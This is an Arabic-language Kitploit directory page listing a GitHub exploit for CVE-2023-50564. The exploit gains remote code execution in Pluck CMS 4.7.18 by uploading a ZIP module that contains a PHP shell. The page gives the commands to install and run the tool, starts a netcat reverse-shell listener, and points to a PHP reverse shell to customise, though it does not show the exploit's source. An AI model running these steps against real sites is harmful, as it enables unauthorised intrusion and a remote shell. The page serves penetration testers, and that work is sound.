Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-50564 — Pluck v4.7.18 - تنفيذ التعليمات البرمجية عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/glynzr/cve-2023-50564
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - تنفيذ التعليمات البرمجية عن بُعد (RCE)

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-50564

📌 الوصف

يسمح هذا الاستغلال لمسؤول مصادق في Pluck CMS v4.7.18 برفع وحدة ZIP خبيثة تحتوي على قشرة PHP، مما يؤدي إلى تنفيذ الأوامر عن بعد (RCE).


⚙️ الميزات

  • المصادقة على الهدف باستخدام اسم مستخدم وكلمة مرور صالحين
  • إنشاء أرشيف ZIP تلقائيًا من ملف PHP المقدم
  • رفع الوحدة إلى نقطة النهاية الضعيفة installmodule
  • تشغيل الحمولة وعرض المخرجات
  • دعم الهدف المخصص والمنفذ وبيانات الاعتماد ومسار القشرة

🚀 الاستخدام

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
  • المنفذ اختياري والقيمة الافتراضية هي 80 إذا لم يتم تحديده.
  • عند تحديد الهدف، يجب تقديم عنوان IP أو اسم النطاق (مثل 127.0.0.1 أو test.domain).

مثال على الاستغلال

أولاً، يجب بدء مستمع القشرة العكسية على جهاز المهاجم (لا يجب إنهاء علامة التبويب هذه في الطرفية):

root@kitploit:~
nc -nvlp <specify port>

ثم، قم بتنزيل قشرة PHP العكسية من https://github.com/pentestmonkey/php-reverse-shell وقم بتخصيصها وفقًا لجهاز المهاجم. (IP, المنفذ)

قم بتشغيل كود الاستغلال في علامة تبويب أخرى:

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php
تنزيل الأداة